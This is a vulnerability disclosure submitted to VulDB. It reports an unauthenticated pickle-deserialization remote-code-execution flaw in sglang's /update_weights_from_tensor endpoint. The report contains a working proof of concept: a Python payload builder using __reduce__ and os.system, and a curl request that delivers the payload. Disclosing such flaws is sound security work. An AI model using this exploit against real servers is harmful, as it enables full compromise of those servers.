Submit #635919: lmsys sglang >=0.4.6 Deserializationinfo

Titel	lmsys sglang >=0.4.6 Deserialization
Beschreibung	> Author: simonhuang ([email protected]), pjf > Affected Products or Components 1. Sglang: Primarily developed by top global AI institutions such as xAI, Berkeley, ByteDance, and Meta, Sglang is currently the most widely used large model inference framework worldwide. Over millions of large model training and inference servers from xAI, Berkeley, ByteDance, Meta, Google, Microsoft, Baidu, Alibaba, and Tencent are running Sglang. Project URL: https://github.com/sgl-project/sglang Affected Versions: sglang >= v0.4.6 Initial Vulnerability Introduction Date: 2025-04-13 > Brief Vulnerability Description Sglang contains a Remote Code Execution (RCE) vulnerability classified as Critical. An unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the target system or obtain a reverse shell, thereby achieving full control over the affected system. > Technical Details of the Vulnerability 1. Technical Details The vulnerability arises from an insecure deserialization issue in the `/update_weights_from_tensor` endpoint of Sglang. Specifically, it exists in the file `python/sglang/srt/entrypoints/http_server.py`, line 572, in the latest `main` branch of the Sglang project. This endpoint accepts POST data in the following format: ```json { "serialized_named_tensors": ["base64-encoded pickle serialized string"], "flush_cache": true } ``` The value of `serialized_named_tensors` is subsequently deserialized using Python's `pickle` module. The arbitrary code execution vulnerability occurs during this deserialization process. 2. Detailed Steps to Reproduce the Vulnerability 2.1 Target Environment Setup In a real-world attack scenario, the attacker would scan for servers running large model inference services. For demonstration, we will either install Sglang manually or use the official Sglang Docker image and run inference on any model (e.g., Llama or Qwen). Option 1: Using the Official Sglang Docker Image - Step (1): Pull the Docker image ```bash docker pull lmsysorg/sglang:latest ``` - Step (2): Download the model ```bash huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False ``` - Step (3): Start the Sglang inference service ```bash sudo docker run --gpus "0" \ --name sglang0 \ --shm-size 32g \ -p 3456:3456 \ -v /models:/models \ --ipc=host \ lmsysorg/sglang:latest \ python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \ --served-model-name Qwen1.5-0.5B \ --tp-size 1 --mem-fraction-static 0.8 \ --host x.x.x.x --port 3456 & ``` Option 2: Manual Installation and Inference Setup - Step (1): Install Sglang ```bash pip install --upgrade pip pip install uv uv pip install "sglang[all]>=0.5.0rc0" ``` - Step (2): Download the model ```bash huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False ``` - Step (3): Launch the Sglang inference server ```bash python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \ --served-model-name Qwen1.5-0.5B \ --tp-size 1 --mem-fraction-static 0.8 \ --host x.x.x.x --port 3456 & ``` After completing either Option 1 or Option 2, the Sglang inference service will be deployed and accessible at `http://<server-ip>:3456`, where `<server-ip>` is the IP address of the server. 2.2 Constructing the Proof of Concept (PoC) Use the following Python script to encode the malicious payload: ```python import base64 import pickle import os # Define malicious class class Malicious: def __reduce__(self): # Arbitrary code can be executed here; using os.system to run echo as a PoC return (os.system, ('echo RCE-Exploit-By-Simon@360!',)) # Serialize the malicious object malicious_data = pickle.dumps([Malicious()]) # Base64 encode the serialized payload malicious_b64str = base64.b64encode(malicious_data) print(malicious_b64str.decode()) # Output: gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4= ``` The output string is the exploit payload (in this example: `gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4=`). 2.3 Executing the Attack Send the following HTTP POST request to the target service using `curl`: ```bash curl --location --request POST 'http://x.x.x.x:3456/update_weights_from_tensor' \ --header 'Content-Type: application/json' \ --data-raw '{ "serialized_named_tensors": ["gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4="], "flush_cache": true }' ``` 2.4 Verifying Successful Code Execution On the server side, observe the Sglang service logs. You should see an error or log entry indicating that the `echo` command was successfully executed, with the output: ``` RCE-Exploit-By-Simon@360! ``` 3. PoC (Proof of Concept) The proof of concept has been fully detailed in section 2 above ("Steps to Reproduce the Vulnerability").
Benutzer	hl4x7eq28 (UID 89020)
Einreichung	16.08.2025 07:07 (vor 10 Monaten)
Moderieren	09.09.2025 15:23 (24 days later)
Status	Akzeptiert
VulDB Eintrag	323203 [lmsys sglang 0.4.6 update_weights_from_tensor main serialized_named_tensors erweiterte Rechte]
Punkte	17

◂ Zurück Übersicht Weiter ▸

Might our Artificial Intelligence support you?

Check our Alexa App!